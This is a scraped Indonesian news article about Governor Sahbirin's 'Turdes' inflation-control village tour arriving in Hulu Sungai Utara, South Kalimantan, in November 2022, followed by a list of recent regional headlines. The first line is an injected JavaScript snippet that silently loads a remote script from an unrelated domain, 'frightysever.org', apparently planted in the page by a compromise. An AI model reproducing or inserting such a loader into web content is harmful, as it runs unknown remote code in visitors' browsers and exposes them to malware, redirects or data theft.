(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Pimpin Turdes Pengendalian Inflasi, Paman Birin Akhirnya Tiba di HSU


KANALKALIMANTAN.COM, AMUNTAI – Memulai start 3 November 2022 di Kantor Sekretariat Provinsi Kalimantan Selatan, rombongan Turun Desa (Turdes) Pengendalian Inflasi tahun 2022 yang dipimpin Gubernur Kalimantan Selatan akhirnya tiba di Kabupaten Hulu Sungai Utara (HSU), Minggu (6/11/2022) sore.

Kedatangan Gubernur Sahbirin yang akrab disapa Paman Birin beserta rombongan disambut Plh Bupati HSU, Forkopimda, Kepala SKPD serta masyarakat di halaman Kantor Bupati HSU.

“Alhamdulillah hari ini sampai juga Pemimpin kita Gubernur Kalimantan Paman Birin bersama Sekretaris Daerah Provinsi Kalimantan Selatan serta rombongan Turun Desa (Turdes) pengendalian Inflasi di tempat kita Kabupaten Hulu Sungai Utara,” kata Zakly Asswan selaku Plh Bupati HSU.

Sementara Paman Birin dalam sambutannya mengatakan aksi Turdes atau turun ke desa bergerak ini dilaksanakan dalam rangka mengatisipasi Inflasi yang terjadi di Provinsi Kalimantan Selatan.

 

Baca juga  : Tradisi Batang Rape Sambut Paman Birin saat Turdes di Tanjung Seloka

“Hari ini Inflasi sedang melanda Dunia, negeri kita, Provinsi kita termasuk di 13 Kabupaten/kota di Kalimantan Selatan,” katanya.

Dikatakannya, bahwa Inflasi saat ini sangat menggangu jalur pertumbuhan perekonomian di Kalimantan Selatan.

“Kita mengetahui pertumbuhan ekonomi sedang mengalami inflasi.Tetapi, dengan adanya wujud dari kegiatan ini mudah-mudahan permasalahan tersebut dapat ditekankan,” jelasnya.

“Ada banyak yang bisa mempengaruhi inflasi, salah satunya cabai rawit saja bisa membuat inflasi maka dari itu inflasi seandainya tidak kita jaga, nantinya akan mempengaruhi pertumbuhan jalannya perekonomian di Kalimantan Selatan,” imbuhnya.

Baca juga  : Tala Pimpin Perolehan Medali Porprov XI Kalsel, Banjarbaru Tergeser ke Posisi Ketiga

Saat ini, Kata Paman Birin pertumbuhan ekonomi sangat tergantung dari batu bara sebagai sumber daya alam yang tak terbarukan yang akan habis jika dikeruk terus-menerus.

“Maka itu pemerintah Kalimantan Selatan di setiap 13 kabupaten/kota terus berupaya untuk mentransformasi sumber daya alam tak terbarukan ke yang terbarukan seperti pertanian, perkebunan, perikanan dan persungaian yang telah nyata kita lakukan setiap harinya,” tutupnya.

Dalam kegiatan Turdes tersebut, serangkaian kegiatan juga dilaksanakannya diantaranya pembagian sembako, dana hibah sarana, bantuan PMT ibu hamil dan Balita, bantuan peralatan rebana, peralatan olahraga, bibit pohon, tanaman dan lain sebagainya. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : cell


Desy Arfianty

Recent Posts

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

2 menit ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

2 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

3 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

3 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

6 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

18 jam ago

This website uses cookies.